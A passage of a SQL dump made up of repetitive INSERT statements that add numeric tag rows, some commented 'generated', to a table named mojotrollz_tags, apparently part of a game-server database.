`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3289, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3290, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3290, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3291, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3291, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3292, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3292, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3292, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3292, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3292, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3293, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3293, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3293, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3293, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3293, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3294, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3294, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3294, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3294, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3294, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3294, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3295, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3295, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3296, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3296, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3296, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3296, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3296, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3296, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3297, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3297, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3297, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3298, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3298, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3300, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3300, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3301, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3304, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3304, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3304, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3305, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3305, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3306, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3306, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3309, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3309, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3309, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3309, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3309, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3309, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3310, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3310, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3310, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3310, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3310, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3310, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3312, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3312, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3312, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3312, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3312, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3312, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3313, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3313, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3313, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3313, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3313, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3313, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3314, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3314, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3314, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3314, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3314, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3314, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3315, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3315, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3315, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3315, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3315, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3315, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3316, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3316, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3316, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3316, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3316, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3316, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3317, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3317, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3317, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3317, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3317, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3317, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3318, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3318, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3318, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3318, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3318, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3318, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3319, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3319, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3319, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3319, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3319, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3319, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3320, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3320, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3320, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3320, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3320, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3320, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3321, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3321, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3321, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3321, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3321, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3321, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3322, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3322, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3322, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3322, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3322, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3322, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3323, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3323, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3323, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3323, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3323, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3323, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3324, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3324, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3324, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3324, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3324, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3324, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3325, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3325, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3325, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3325, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3325, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3325, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3326, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3326, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3326, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3326, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3326, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3326, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3327, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3327, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3327, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3327, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3327, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3327, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3328, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3328, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3328, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3328, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3328, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3328, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3329, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3329, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3329, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3329, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3329, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3329, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3330, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3330, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3330, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3330, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3330, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3330, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3331, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3331, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3331, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3331, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3331, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3331, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3332, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3332, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3332, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3332, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3332, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3332, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3333, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3333, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3333, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3333, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3333, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3333, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3334, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3334, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3334, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3334, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3334, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3334, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3335, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3335, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3335, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3335, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3335, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3335, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3336, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3336, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3336, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3336, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3336, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3336, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3337, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3337, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3337, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3337, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3337, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3338, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3338, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3338, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3338, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3338, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3339, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3339, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3339, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3339, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3339, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3341, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3341, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3342, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3342, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3342, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3342, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3342, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3342, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3343, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3343, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3343, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3344, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3344, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3344, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3344, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3344, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3344, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3345, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3345, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3345, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3345, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` 